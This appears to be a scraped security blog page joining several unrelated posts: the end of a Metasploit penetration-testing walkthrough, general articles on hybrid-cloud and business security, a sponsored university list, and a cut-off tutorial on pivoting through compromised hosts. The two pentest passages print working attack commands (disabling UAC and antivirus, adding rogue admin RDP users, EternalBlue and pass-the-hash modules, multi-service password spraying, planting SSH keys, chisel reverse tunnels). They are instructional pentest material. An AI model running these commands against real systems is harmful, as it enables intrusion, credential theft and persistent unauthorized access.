route add 123.123.123.0/24 2
# PIVOTING USING AUTOROUTE MODULE
use post/multi/manage/autoroute
set session 2
run
### IN ACTIVE SESSION WITH METERPRETER
run autoroute -s 123.123.123.0/24
run autoroute -p 
### LOCAL PORT FORWARDING FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.4

Now Metasploit modules will “automagically” pivot through the compromised host and the target systems on the internal network (123.123.123.0/24).
If you want to connect with RDP, use it as usual, but connect to the localhost instead of the target to use the created tunnel with Metasploit.

### CONNECT VIA METASPLOIT TUNNEL OVER RDP PROTOCOL
rdesktop 127.0.0.1:3389

3.6. HOST DISCOVERY & PORT SCANNING ONCE AGAIN

You managed to set up a jump host. Now it is time to repeat 1st and 2nd phases of penetration testing through the compromised host in the internal network.
Conduct TCP Connect Scan over the subnet 123.123.123.0/24:

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 0-65535
set CONCURRENCY 50
set THREADS 100
run

Again, the world is not so utopian, and the above-mentioned full-range TCP connect scanning will be very slow.
Additionally, you cannot use db_namp in the internal network over the created tunnel to conduct a vulnerability scanning.
To mitigate this issue, you have to:
1. Get the compatible nmap for the target system 10.10.10.2
2. Upload it to 10.10.10.2
3. Install it on 10.10.10.2
4. Run on the 10.10.10.2 with the -oX option flag.
5. Download the results to your host 10.10.10.1.
6. Import the results to the msfdb.

### DOWNLOAD NMAP INSTALLER FOR WINDOWS:
https://nmap.org/dist/nmap-7.80-setup.exe
### DOWNLOAD NMAP FOR LINUX
https://github.com/ernw/static-toolbox/releases/download/nmap-v7.91SVN/nmap-7.91SVN-x86_64-portable.zip
### UNZIP THE PACKAGE FOR LINUX
unzip nmap-7.91SVN-x86_64-portable.zip

It is essential to download nmap 7.8 for Windows systems because if you cannot use RDP to install it manually and bypass UAC just by clicking “yes” in the window, you will have to use the silent installation flag /S which is supported till version 7.8 in the nmap installer (dunno why).

### WINDOWS SERVER CASE
## SILENT INSTALLATION
# UPLOAD THE INSTALLER
upload nmap-7.80-setup.exe .
# SET UAC TO 0
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# TURN OFF ANTIVIRUS
run killav
# REBOOT THE SYSTEM
shutdown /r
# WAIT A FEW MINUTES AND RENEW THE METERPRETER SESSION
# INSTALL THE nmap USING SILENT INSTALLATION
nmap-7.80-setup.exe /S
## RDESKTOP INSTALLATION - NO UAC BYPASS AND REBOOTING
# ENABLE RDP
run getgui -e
# CHECK IF THERE IS AN ACTIVE RDP SESSION WITH MIMIKATZ
kiwi_cdm ts::sessions
# IF YES - USE IT, IF NOT ADD NEW USER
run getgui -u karmazRDP -p karmazRDP
# PREPARE A TUNNEL WITH LOCAL PORT FORWARDING FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.4
# CONNECT USING TUNNEL OVER RDP WITH CREATED USER AND INSTALL NMAP
rdesktop 127.0.0.1:3389### LINUX SERVER CASE
# UPLOAD THE INSTALLER DIRECTORY
uplaod nmap-7.91SVN-x86_64-portable .
# INSTALL USING BASH SCRIPT
chmod +x run-nmap.sh
./run-nmap.sh

After those steps, just run nmap as always to scan the internal network:

nmap.exe -T5 123.123.123.0/24 -A -Pn -p- --script vuln --append-output -oX internal_scan1

In the end, download the results and import them to msfdb :

### ON THE COMPROMISED HOST IN METERPRETER SHELL
# DOWNLOAD RESULTS USING METERPRETER
download internal_scan1.xml.
### IMPORT RESULTS TO MSFDB
db_import internal_scan1.xml

3.7. EXPLOITATION ONCE AGAIN

After making the jump host using route or autoroute, you have found that 123.123.123.4 is vulnerable to MS17–010 EternalBlue.
To exploit this, just run the proper module and set things up, like the target system is in your subnet:

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# EXPLOIT MS17–010 EternalBlue
use exploit/windows/smb/ms17_010_psexec
set LHOST 10.10.10.1
# YOU CAN SPECIFY ALL HOSTS FROM MSFDB AS RHOSTS VARIABLE
hosts -R
run

3.8. PASSWORD SPRAYING & PASSING THE HASHES

You got the usernames, passwords, hashes, access to the internal network through the jump host, and results of the subnet scanning imported to the msfdb.
You can use them within Metasploit Framework to perform password spraying and PSH attacks.
Since there is no single module to perform password spraying for every service that has been found, you can use the resource command to start selected password spraying modules one by one from the txt file.
You can see an example of the msf_password_spraying.txt file below, all of the commands before initiating modules are setting the variables globally via setg command to set it for all modules at once.

### SAVE BELOW COMMANDS IN msf_password_spraying.txt
## FIRST SET UP VARIABLES FOR ALL MODULES
# SET RHOSTS FROM THE MSFDB FOR ALL MODULES
unsetg RHOSTS
hosts -R
# USE ALL USERS:PASSWORDS FROM THE MSFDB DURING BRUTEFORCING
setg DB_ALL_CREDS true
setg DB_ALL_PASS true
setg DB_ALL_USERS true
# IN ADDITION USE CUSTOM WORDLIST FOR BRUTEFORCING
setg USER_FILE /home/karmaz95/tools/crimson/words/logins.txt
setg PASS_FILE /home/karmaz95/tools/crimson/words/passwords.txt
# RECOND ANONYMOUS/GUEST LOGIN TO MSFDB
setg RECORD_GUEST true
# TURN OFF PRINTING OUTPUT FOR ALL ATTEMPTS
setg VERBOSE false## LOAD & RUN MODULES IN THE BACKGROUND
use scanner/smb/smb_login
exploit -j
use auxiliary/scanner/ftp/ftp_login
exploit -j
use auxiliary/scanner/ssh/ssh_login
exploit -j
use auxiliary/scanner/telnet/telnet_login
exploit -j
use auxiliary/scanner/vnc/vnc_login
exploit -j
use auxiliary/scanner/mssql/mssql_login
exploit -j
use auxiliary/scanner/mysql/mysql_login
exploit -j
use auxiliary/scanner/postgres/postgres_login
exploit -j
use auxiliary/scanner/rservices/rsh_login
exploit -j
use auxiliary/scanner/nntp/nntp_login
exploit -j
use auxiliary/scanner/pcanywhere/pcanywhere_login
explpit -j
use auxiliary/scanner/pop3/pop3_login
exploit -j
use auxiliary/scanner/rservices/rexec_login
exploit -j
use auxiliary/scanner/rservices/rlogin_login
exploit -j
use auxiliary/scanner/winrm/winrm_login
exploit -j
use auxiliary/scanner/mongodb/mongodb_login
exploit -j
use auxiliary/admin/oracle/oracle_login
exploit -j
use auxiliary/scanner/redis/redis_login
exploit -j

After saving the above commands in msf_password_spraying.txt you can launch the Password Spraying attack by typing in msfconsole
resource msf_password_spraying.txt.
Alternatively, you can use 3rd party tools like BruteSpray to perform a Password Spraying attack.
Another attack that you will commonly face during corporate network Penetration Testing is Passing The Hash.
If you want to conduct this attack, use hashes in place of passwords.

### EXAMPLE OF PSH ATTACK OVER WHOLE SUBNET 123.123.123.0/24
use exploit/windows/smb/psexec
setg RHOSTS 123.123.123.0/24
setg LHOST 10.10.10.1
set SMBpass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
exploit -j

FINAL WORDS

This is a simplified Cyber Kill Chain for Penetration Testing corporate network with Metasploit Framework. There is much more to describe, but it is impossible to do it in one article. Treat it as a template that you can improve with other tools and techniques. I hope that everyone starting Junior Pentester, after reading this article, will know how to approach the topic of penetrating large companies with many subnets, while older colleagues and senior pentesters will refresh their memory and update the set of commands valid in 2022. Thanks for reading!

If you enjoy this article, I ask that you make a donation to the Hackers For Charity non-profit organization.

A sum of $9.00 will feed a child for a month, so any contribution makes a difference.

The article was originally published at: https://karol-mazurek95.medium.com/solid-metasploit-b1e043470b8c

Securing End Users in the Hybrid Cloud

Posted 3 years ago by Bartek Adach

Securing End Users in the Hybrid Cloud

by Gilad David Maayan

What is a Hybrid Cloud?

A hybrid cloud consists of public and private cloud resources that share data and applications. It extends a private cloud with the flexibility and scalability of private cloud resources and frees up local resources for sensitive data and critical applications.

In this model, the private cloud safely holds business-critical applications and sensitive data behind a corporate firewall, while the public cloud provides resources for non-sensitive computing. It enables organizations to scale private infrastructure to the public cloud seamlessly. It helps handle peaks in demand without giving access to all data to third-party data centers.

It also eliminates the need for massive capital expenditures dedicated solely to handling short-term spikes in demand. There is no need to buy, program, and maintain resources and equipment that remain idle. Instead, the hybrid model enables paying only for temporary resources during the time they are needed.

Planning a hybrid cloud approach involves considering how to move workloads between private and public clouds. Hybrid cloud migration strategies include redesign, refactoring, and lift and shift.

Hybrid Cloud End User Security Challenges

Hybrid cloud challenges related to end users include:

Data Leakage

Sensitive data can be compromised in various ways—it can be destroyed, corrupted, inappropriately accessed, or lost. A hybrid cloud environment can put data at risk (even when stored in the most secure private cloud) because the environment shares data with a public cloud.

Complex Access Management

Authentication and authorization have become a challenging endeavor in hybrid clouds. Remote access via VPN is not longer enough in a cloud environment, because it provides unqualified access to the entire network. Proper implementation requires adopting centralized protocols to access data across all cloud environments. It also requires using identity and access management (IAM) systems and single sign-on (SSO) technology to control access permissions across the hybrid cloud.

Endpoint Hybrid Cloud Security

Endpoints interacting with a hybrid cloud are susceptible to many attack vectors, those inherent to public and private clouds and those posed by public cloud integration. Here are common hybrid cloud security challenges:

Malware and viruses infect endpoints — occurs when threat actors or malware gains unauthorized access through a public cloud, moves laterally to endpoints, and potentially reaches private cloud environments. A single infected endpoint can spread malware to many other client machines.
Security and compliance gaps — occurs due to a lack of central management and poor security visibility across the entire organization.
API vulnerabilities — unprotected API endpoints can expose sensitive data to malicious actors. Typically, actors manipulate sensitive data by exploiting an authentication or authorization token or key.

Hybrid Cloud End User Security Best Practices

Here are endpoint security best practices to help protect hybrid cloud environments:

Centralize Your Security Strategy

Hybrid cloud environments are dynamic and complex. Centralized security can help obtain visibility and control into the entire security landscape. It requires a centralization tool that supports all relevant clouds and tools. Once you set up this integration, you should be able to apply security measures and share security responsibilities between teams.

Secure User Endpoints and Browsers

Organizations allow users to access cloud resources using web browsers. You can protect this component by implementing client-side security to ensure user browsers remain up-to-date and protect against web-based vulnerabilities and other vulnerabilities in the user’s operating system or other deployed applications.

Endpoint security solutions can protect end-user devices such as mobile devices and personally-owned laptops used for remote work, providing multiple layers of security including next-generation antivirus (NGAV), content filtering, behavioral analysis to detect suspicious activity on an endpoint, and endpoint detection and response (EDR), which helps security teams detect and respond to breaches on an endpoint.

Network Segmentation

Network segmentation helps prevent and block attacks by restricting access to specific datastores and services. It helps minimize data loss risks and limits the scope of damage resulting from a successful attack. You can also use Ethernet Switched Path (ESP) technology to hide network structure and make it more difficult for threat actors to move laterally between network segments.

Preventing Cloud Phishing by Securing Credentials

Threat actors actively attempt to obtain credentials to breach into systems and networks. Here are several user behaviors that can result in compromised credentials:

Sharing credentials in an insecure manner
Storing credentials on public devices
Using weak passwords that are easy to crack

In addition to the above insecure internal practices, external threats attempt to compromise credentials. For example, credential phishing schemes use email scams and malicious scripts to trick users into using fake portals, where they are prompted to reveal their credentials.

Once threat actors obtain user credentials, they gain unauthorized access to corporate systems, applications, and data. You can prevent cloud phishing by implementing the following measures:

Identity management—helps detect abnormal use of credentials.
Secure password and login policies—set the overall policy with a session timeout policy to periodically force users to change their passwords.
Multi-factor authentication (MFA)—provides an extra layer of protection against compromised credentials.

Conclusion

In this article, I covered the key challenges of securing end users in a hybrid cloud environment, and provided several best practices that can help improve the security posture on end user devices:

Centralize the security strategy—ensure you have one set of security tools that governs security for users accessing on-premise and public cloud resources.
Secure endpoints and browsers—deploy endpoint security technology to ensure user endpoints, especially personal devices, do not have malware or other vulnerabilities.
Network segmentation—ensure that users connect to a network segment containing the resources they need and don’t have unnecessary access to other parts of the network.
Prevent cloud phishing—take measures to prevent credential compromise, by implementing identity management, secure password policies, and MFA.

I hope this will be useful as you enhance security measures in your hybrid cloud environment.

Good Places to Study Cybersecurity

Posted 3 years ago by Bartek Adach

Good Places to Study Cybersecurity

|sponsored post|

Mobile phones, computers, cars, and even some household appliances bind themselves and their owners with a huge amount of data. Indeed, information systems in business, trade, and finance have reached a global level. But at the same time, the number of threats related to damage or substitution of this data grows. Therefore, cybersecurity specialists are more sought-after than ever! They protect the information, predict what the criminals aim to do, and create a secure architecture for using data.

Today, cybersecurity professionals work not only in large financial and IT companies but also in government agencies and defense departments. Such institutions are ready to employ talented pros due to the increase in the number of cybercrimes and cases of cyber terrorism.

Unfortunately, hacker attacks are registered in all corners of the world. So, which university should you choose to get the necessary knowledge and skills to work in the cybersecurity field?

University of Alabama at Birmingham

One can go for a Cyber Security specialization in Computer Sciences program at the University of Alabama Birmingham. The reasons are plenty! Here, students learn methods for saving databases and monitoring activity in networks. They also explore the ways to protect information and technologies for repelling hacker attacks. Seems that the study load is pretty huge, right?

Of course, it would be wise to start preparing for admission early to understand the specifics in advance. And if you entrust other tasks to an academic essay writer at EssayPro, you will free up the necessary time and energy for yourself. After all, nothing is impossible when you have someone to rely on.

So, let’s go back to the university program. The focus is also on cryptography and cloud security. Interestingly, education is conducted in the ultra-modern Center for Cyber Security. And it already has its own history of cybercrime investigations, research projects, and commercially successful startups. Plus, students use the most advanced software that is continuously updated.

As for diplomas, you can get:

The graduate-level Cyber Security Certificate. To enroll, you need to have a four-year undergraduate degree from an accredited school;
M.S. in Cyber Security. There are no specific requirements for your bachelor's degree, but you should be familiar with the main areas of the program. In addition, students often need to complete a series of required courses to be enrolled.

So, what awaits you after school? According to the Bureau of Labor Statistics, employment in the IT field is to grow 13 percent through 2026. And these occupations are to add about 557 000 new jobs. Indeed, every organization and enterprise deals with cybersecurity issues. As a result, there's a need for 2 million professionals all over the world. Of course, companies themselves are trying to educate employees about the best cybersecurity practices. Would you like to learn something for yourself? Read this article to always keep your data safe.

City University London

If you are interested in studying outside the US, be sure to pay attention to this famous university. Located in one of Europe's most vibrant cities, it has good positions in rankings, including being third in London for student satisfaction. The university is very multinational: there are educators from over 75 countries.

Before starting an undergraduate program (3 years) after high school, you need to complete a preparatory course called Foundation (1 year). It gives you an introductory knowledge of the subjects and develops the necessary skills.

In addition to the diplomas of the university itself, all graduates receive a special professional accreditation, the Chartered Institute for IT (BCS). Thus, graduates don’t need to take additional tests and courses to join the community of British IT specialists.

Do you already have a diploma related to IT? Then, choose the master's program in Cyber Security. A year of study will cost you about £20,000. It consists of six compulsory modules, two ones that you can select yourself and a project that you finish together with your supervisor. The Master's program lasts for 12 months, and in the meantime, you can undergo a 6-months internship.

As for the career perspectives, the employment rate of City University graduates is over 90%, so you will surely find something for yourself.

Macquarie University in Sydney

Have you always wanted to live in Australia? Now, you can combine business with pleasure by enrolling at Macquarie University. This school, together with Optus (an Australian telecommunications company), founded the Optus Macquarie University Cyber Security Hub. This is an ultra-modern hub for developing and applying cyber protection tools. The hub is used not only for research and security of business projects, but it is also open to all university students.

With such an approach, students learn theory and solve real cybersecurity problems of companies and organizations. Yes, it will certainly be different from the usual lectures about web browsers or programming languages.

At Macquarie University, cybersecurity is studied at the undergraduate and graduate levels. The first one lasts for 3 years (+1 year for a special introductory Foundation course if you graduated from school in another country). The Master’s program is 2 years long. A preparatory course for this is not required. But the main thing (in addition to English proficiency) is to have a bachelor’s diploma in the same or a close field.

As for the fees, the Bachelor of Cybersecurity Program would cost you 119 400 AUD, which is approximately 84 thousand US dollars. Like any good school, Macquarie University offers scholarships to brilliant students. They typically range from A$10,000 to A$15,000 each.

As for the future, Australia is a country with an open migration policy. Thus, you can get a graduate visa and stay in the country for anywhere between 18 months up to 4 years, depending on your qualification, to find a job.

To Wrap It Up

According to the Data Age 2025 report published by an IDC analyst firm, there will be 163 zettabytes of data worldwide by 2025. Professionals also mention that the bulk of it will be produced not by users but by companies. And a fifth of all information will be considered critical for the people's safety and global peace.

Moreover, each of these bytes can be attacked. Add to this the blockchain development and fastly-growing cryptocurrency market (by the way, more and more students invest in crypto), and you will see what the job's main drivers are. That is why the need for cybersecurity specialists is so great. We hope that you will select the college of your dreams and apply the gained knowledge in practice!

How To Scale Your Cybersecurity Strategy For Business Growth

Posted 3 years ago by Bartek Adach

How To Scale Your Cybersecurity Strategy For Business Growth

Cybersecurity is essential for every business that has pushed operations online. You've got to provide a secure online environment for your customers and employees. A robust cybersecurity strategy for your business helps you protect your customers' private information from access by unauthorized individuals. In addition, it helps you with online operations. For instance, if you have an online shop, you have to prove to your customers that as they give their financial details online, no one can intercept them.

Moreover, it’d help if you also strategized on how you can let your cybersecurity protocols grow to accommodate your business growth. Some cybersecurity strategies you might have in place were good enough as you started your business. However, as your business has grown, you need to leverage expanded measures to fit your business growth. In addition, cybercriminals and hackers have innovated new attacks. Thus, you've got to embrace the latest technology to boost your cybersecurity strength.

To ensure that your cybersecurity measures accommodate your business growth, here are cybersecurity strategies to implement:

Institute The Right Measures

In the last decade, cybersecurity attacks have increased at an alarming rate. Some of the common attacks used by cybercriminals include ransomware, malware, spam, distributed denial of service (DDoS) attacks, corporate account takeover (CATO), phishing, and automated teller machine (ATM) cash out. Therefore, as you plan your business growth, remember to secure your business from the listed attacks. And it's only possible by taking the proper measures.

Appropriate measures for combating cybersecurity attacks include purchasing the right equipment and software. Some tools that you may consider in your business include penetration testing, PKI services, attack service management tools, firewall, network security monitoring tools, antivirus software, and web vulnerability scanning tools.

Furthermore, you can leverage automation that ensures you get real-time surveillance and reporting of any breaches in cybersecurity. Once you've put in place the proper cybersecurity measures, you can go ahead to ensure they're well optimized for scalability, especially for a fast-growing business.

Benchmark Your Security

One sure way to know that you're in the right direction to achieve a robust cybersecurity strategy is to measure it. And to do this, you can leverage industry standards to help you put in your controls and identify possible threats related to your business. Ideally, some industry standards are very comprehensive. Some of the standards might be directly applicable to your business while others might not.

Another way of benchmarking your cybersecurity processes is by watching what your competitors in the industry are doing. You can identify some of the best-performing businesses in your industry and research how they streamline their cybersecurity operations. It's essential for startups so you can have a head start and formulate a pathway for your cybersecurity roadmap. Knowing what your competitors are doing helps you see the industry's tricks and ensure you've got a formidable competitive advantage.

Have Company-Wide Cybersecurity Culture

Many businesses fail to understand cybersecurity is a collective work among all the employees in your company. As a result, it shouldn't be left to the IT department alone. Thus, invest in having a company-wide sensitization by conducting training programs. In that light, train your workers on how to handle cyber threats. In addition, teach them how to surf the internet safely because internet attackers take advantage of unsuspecting employees to affect their malware and ransomware attacks.

Furthermore, you can teach your staff how to use security protocols established in your business. For instance, it's essential to train your employees on using antivirus and how to update it. Moreover, it’d help if you taught them how to use the firewall and the virtual private network (VPN) in your business.

For the professional tasks of securing your business, invest in employing experts to manage your network. Moreover, you can sponsor some of your IT experts to study specific fundamental courses for keeping your business safe online. Though this venture might be expensive, it's worth doing because cybersecurity attacks might be highly disastrous. It might cost your business hundreds or thousands of dollars.

Try Managed Services

Cybersecurity is usually an expensive investment. As a result, it can be staggering if you have a small business or a startup. The equipment and software for keeping your business secure online can be a tall order for most companies. If this scenario describes you, worry no more because there’s a solution for you. You can choose to partner with IT-managed service companies. Managed services are an excellent option for businesses with a limited budget compared to their competitors who might have modern technology in cybersecurity.

The advantage of partnering with a managed IT service provider is that they invest heavily in cutting-edge cybersecurity technology. In addition, you can receive tailored services that are expandable to accommodate your business growth in the future. Therefore, as your business grows, your third-party service provider scales up the technology to accommodate the increase of your business.

Moreover, managed service providers are always at the forefront of knowing the latest cybersecurity attacks. Thus, they can keep your business well protected as you concentrate on other business matters. Such a plan helps your company improve productivity.

Perform Cybersecurity Audits

A cybersecurity audit is essential in keeping your business safe 24/7. It involves a thorough analysis and review of your business's IT infrastructure. Also, it detects possible threats and vulnerabilities, glaring weak links, or high-risk business practices. In addition, cybersecurity audits can be used to examine compliance.

Moreover, security audits are used to test if your business's IT adheres to the prescribed internal and external data security regulations such as your company's IT policies, security controls, and procedures. Auditing your cybersecurity procedures ensures that the growth of your business remains strictly within the set policies.

Have A Proper Documentation

Every significant project needs to be documented. Spell out your cybersecurity plans, procedures, policies, risk management, and guidelines in your documentation. In addition, attach your strategic IT plan to your documentation. Documentation guarantees a reference point where you can see the milestones you've walked in keeping your cybersecurity protocols top-notch.

Final Thoughts

A robust cybersecurity strategy helps your business be safe while working in cyberspace. As your business grows, you need to ensure that your cybersecurity measures grow to accommodate your growth. In that light, implement the proper cybersecurity measures, have regular cybersecurity audits, and have a business cybersecurity culture. Finally, try out managed cybersecurity services, benchmark your security, and document every cybersecurity process.

The shades of tunneling

Posted 3 years ago by Bartek Adach

The shades of tunneling

Solution for common pivoting problems during a Penetration Test

by Karol Mazurek

During penetration testing, you may encounter the scenario when you want to be able to pivot through one of the compromised hosts to gain access to other systems in the internal network and continue testing. In this article, you will be guided through 3 scenarios of pivoting and you will learn different tools and techniques that can help you achieve this goal.

SCENARIO I

You had gained root privilege over the Linux Server and conducted a host discovery in the internal network, that only the compromised host has access to. Now you want to pivot through this host. How to do it quickly?

1.1. SSH & PROXYCHAINS

One way to achieve this goal is by using SSH dynamic port forwarding which establishes a secure channel between an SSH client and SSH server.
It listens on a local port and anything sent to this port is forwarded through the SSH tunnel to the SSH server which determines where to send the traffic.
SSH functions as a SOCKS4 or SOCKS5 proxy server.

SSH dynamic port forwarding

### ON YOUR MACHINE (10.10.10.1)
# CREATE A DIRECTORY FOR MANAGING KEYS
mkdir piv_keys && chmod 700 piv_keys
# GENERATE NEW SSH KEY
ssh-keygen -f piv_keys/id_rsa_1
# COPY PUBLIC KEY CONTENT TO CLIPBOARD
cat piv_keys/id_rsa_1 | clip.exe # OR JUST CAT AND COPY### ON A COMPROMISED MACHINE (10.10.10.2)
# ADD YOUR SSH PUBLIC KEY TO authorized_keys
echo "ssh-rsa AAAA...[REDACTED]..." >> /root/.ssh/authorized_keys### ON YOUR HOST (10.10.10.1)
# START SSH DYNAMIC PORT FORWARDING
ssh -D 9999 -f -N root@10.10.10.2 -i piv_keys/id_rsa_1

ON YOUR HOST (10.10.10.1)
# CONFIGURE PROXYCHAINS (/etc/proxychains4.conf)
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 9999

After adding the above line to the config file, you can start using any tool with proxychains , you can see some examples below:

When it comes to using nmap, only TCP Connect Scan (-sT) works.
You can read more about using nmap over ProxyChainshere.
This way, you can interact with the subnet (123.123.123.0/24) from your starting host (10.10.10.1) with no need to upload the tools to the jump host (10.10.10.2) and installing them.

How do ProxyChains actually works?

ProxyChains is a UNIX program, that hooks network-related libc functions in dynamically linked programs via a preloaded DLL and redirects the connections through SOCKS4/5 or HTTP proxies.

1. When you create a SSH tunnel between your starting machine (10.10.10.1) and Remote Server (10.10.10.2), to access the internal network (123.123.123.0/24) you additionally open TCP socket on port 9999 locally (127.0.0.1).

2. So now you need to somehow interact with this newly created socket (127.0.0.1:9999)which in fact works as a TCP Proxy Server to access the SSH tunnel between 10.10.10.1 and 10.10.10.2 and here comes the ProxyChains.

3. It connects to 127.0.0.1:9999 and wraps any requests to 10.10.10.1 which is then forwarded by SSH client (10.10.10.1) to SSH server (10.10.10.2).

LIMITATIONS:

ProxyChains works only on dynamically linked programs.
Both ProxyChains and the tool to call must use the same same libc.
You can only use TCP connect technique for port scanning.

1.2. METASPLOIT & AUTOROUTE & PORTFWD

If you exploit the vulnerable system using Metasploitand establish the meterpreter session, you have the option to use this session to pivot to other systems using route command or autoroute module.

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# PIVOT USING ROUTE COMMAND
route add 123.123.123.0/24 2
# PIVOT USING AUTOROUTE
use post/multi/manage/autoroute
set session 2
run
# PIVOT USING AUTOROUTE IN METERPRETER SESSION
meterpreter> run autoroute -s 123.123.123.0/24
meterpreter> run autoroute -p

Now Metasploit modules will “automagically” pivot through the compromised host and the target systems on the internal network (123.123.123.0/24).
For example, you found that 123.123.123.4 is vulnerable to MS17–010 EternalBlue. To exploit this vuln, just run the proper module and set things up, like the target system is in your subnet:

### ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# EXPLOIT MS17–010 EternalBlue
use exploit/windows/smb/ms17_010_psexec
set LHOST 10.10.10.1
set RHOST 123.123.123.4
run

Another example, if you want to conduct TCP Connect Scan over the subnet 123.123.123.0/24:

ON YOUR HOST IN MSFCONSOLE (10.10.10.1)
# CONDUCT TCP CONNECT SCAN
use auxiliary/scanner/portscan/tcp
set RHOSTS 123.123.123.0/24
set PORTS 1-1024
set THREADS 50
run

If you want to connect with RDP using Metasploit Framework as a tunnel:

METASPLOIT TUNNEL FROM LOCALHOST TO 123.123.123.1 FOR RDP
portfwd add –l 3389 –p 3389 –r 123.123.123.1
### CONNECT USING TUNNEL
rdesktop 127.0.0.1:3389

SCENARIO II

You had managed to pivot through a compromised host (123.123.123.2) and gained a low privileged user CRIMSON\bofer on the Windows Server (123.123.123.3). During the investigation on the newly compromised host, you found that you can leverage the buffer overflow vulnerability, that lies in the printer.exe(service running on 127.0.0.1:4444) for privilege escalation to NT AUTHORITY\SYSTEM . You downloaded the vulnerable printer.exe to your machine, developed an exploit, wonder how to send it from your host (10.10.10.1) to the Windows Server (123.123.123.3) service printer.exe running on the loopback interface (127.0.0.1:4444)?

This time there is no way to use an SSH server on the target (Windows System 123.123.123.3) since there is no SSH preinstalled and you have no privileges to install it.
In such a situation, it will be a good idea to use chisel.exe through a previously established SSH tunnel with ProxyChains for tunneling.

### ON YOUR HOST (10.10.10.1)
# START CHISEL SERVER ON PORT 8000
proxychains chisel server -p 8000 --reverse
# START NETCAT LISTENER ON PORT 4000
nc -nlvp 4000### ON A COMPROMISED MACHINE (123.123.123.3) 
# START CHISEL CLIENT 
chisel.exe client 10.10.10.1:8000 R:4000:127.0.0.1:4444

Now if you want to exploit buffer overflow on the vulnerable service available only on 127.0.0.1:4444 for the 123.123.123.3 from your machine (10.10.10.1), you have to run a developed exploit against 10.10.10.1:4000 on your host.

SCENARIO III

You had gained NT AUTHORITY\SYSTEM on another Windows Server (123.123.123.4) through MS17–010 EternalBlue and during the post-exploitation pillaging acquire a piece of information from the browser history of the user CRIMSON\karmaz that he was connecting to a website http://123.123.124.2:80/blog . That is why you conduct a host discovery of adjacent network segment (123.123.124.0/24). You have found one, new host from this subnet: 123.123.124.3. Now, how to proxy traffic to this newly found host from your starting machine (10.10.10.1)?

3.1. OpenSSH & PROXYCHAINS

Since you got NT AUTHORITY\SYSTEM you can install anything you want on the compromised Windows Server.
In such a scenario OpenSSH comes in handy, install it if it is not available.

### ON COMPROMISED HOST USING METERPRETER SESSION (123.123.123.4)
## GUIDE USING RDP:
# TURN ON RDP ON THE COMPROMISED MACHINE
run getgui -e
# ADD USER IF THERE ARE NON
run getgui -u karmazRDP -p karmaz!RDP123
# USER SHOULD BE IN ADMINISTRATOR GROUP, IF NOT - ADD HIM
shell
net localgroup administrators karmazRDP /add### ON YOUR HOST (10.10.10.1)
# CONNECT OVER PROXYCHAINS & RDP USING PREVIOUS TUNNEL
proxychains xfreerdp /u:DOMAIN\\karmazRDP /p:karmaz\!RDP123 /v:10.10.10.1### ON COMPROMISED HOST USING RDP WINDOW
# DOWNLOAD latest release of OpenSSH: LINK 
# INSTALL OpenSSH instructions:  LINK
# GENERATE NEW KEY PAIR
ssh-keygen
# START SSH AGENT & ADD NEW IDENTITY
Start-Service ssh-agent
ssh-add C:\Users\karmazRDP\.ssh\id_rsa
# ADD PUBLIC KEY TO authorized_keys 
copy content of ~\.ssh\id_rsa.pub 
add it to C:\ProgramData\ssh\administrators_authorized_keys

The tricky part is, if the user you logged in via SSH client is part of the local Administrator group, then his public key has to be added to C:\ProgramData\ssh\administrators_authorized_keys not to the
C:\Users\<username>\.ssh\authorized_keys .
Another common problem is wrong permissions set on the file and you can mitigate this using the below PowerShell script:

$acl = Get-Acl C:\ProgramData\ssh\administrators_authorized_keys
$acl.SetAccessRuleProtection($true, $false)
$administratorsRule = New-Object system.security.accesscontrol.filesystemaccessrule("Administrators","FullControl","Allow")
$systemRule = New-Object system.security.accesscontrol.filesystemaccessrule("SYSTEM","FullControl","Allow")
$acl.SetAccessRule($administratorsRule)
$acl.SetAccessRule($systemRule)
$acl | Set-Acl

If you want to install OpenSSH from the command line, even if you are
NT AUTHORITY\SYSTEM you have to switch off UAC because it will pop up a message window that you cannot handle from the command line.

## GUIDE USING COMMAND LINE (WITHOUT RDESKTOP)
# SET UAC TO 0
C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# REBOOT THE SYSTEM
shutdown /r
# RENEW THE METERPRETER SESSION AND FOLLOW THE RDP STEPS FROM ABOVE

Now to set a tunnel from 10.10.10.1 over 10.10.10.2 and over 123.123.123.4 to the 123.123.124.0/24 subnet, you have to use the same private key on the 10.10.10.1 and 10.10.10.2 which corresponding public key is added to the authorized_keys on the 123.123.123.4 .

### ON THE SECOND JUMP HOST - 123.123.123.4
Copy private key i.e. content of ~\.ssh\id_rsa### ON THE FIRST JUMP HOST - 10.10.10.2
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp /root/.ssh/id_rsa /root/.ssh/id_rsa.bck
cp /root/.ssh/id_rsa.pub /root/.ssh/id_rsa.pub.bck
# MAKE NEW PRIVATE KEY FILE AND NAME IT id_rsa
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 /root/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
ssh-keygen -y -f /root/.ssh/id_rsa > /root/.ssh/id_rsa.pub### ON THE STARTING HOST - 10.10.10.1
# MAKE A BACKUP OF OLD ROOT PRIVATE KEY AND PUBLIC KEY
cp ~/.ssh/id_rsa ~/.ssh/id_rsa.bck
cp ~/.ssh/id_rsa.pub ~/.ssh/id_rsa.pub.bck
# PASTE THE COPIED PRIVATE KEY FROM 123.123.123.4 IN ~/.ssh/id_rsa
# SET CORRECT PERMISSIONS
chmod 600 ~/.ssh/id_rsa
# CREATE NEW PUBLIC KEY
